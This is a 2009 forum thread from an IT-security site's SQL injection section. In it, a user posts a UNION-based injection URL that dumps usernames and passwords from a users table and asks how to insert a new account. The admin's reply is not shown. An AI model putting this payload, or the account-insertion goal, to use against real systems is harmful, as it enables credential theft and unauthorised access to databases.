|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 63
Members: 0
Total: 63
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Insert data into DB |
|
Posted: Mon Apr 20, 2009 1:34 am |
|
|
10_Sec_Hero |
Advanced user |
|
|
Joined: Oct 22, 2008 |
Posts: 52 |
|
|
|
|
|
|
|
OK say we have vulnerability:
Code: | http://www.host.net/script.php?id=111 and 1=0 union select all 1,2,3,concat(user,0x3a,pass),5,6,7,8 from tbl_users-- |
...and I want to insert a new username:jimmy and a password:password.
How do I do that?
Looked up here and on google and the closest thing I could find was INSERT() but I have no idea how to create a valid statement, all I get is errors.
Any help is much appreciated, thx. |
|
_________________ Sky Is The Limit !! |
|
|
|
Posted: Mon Apr 20, 2009 7:57 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|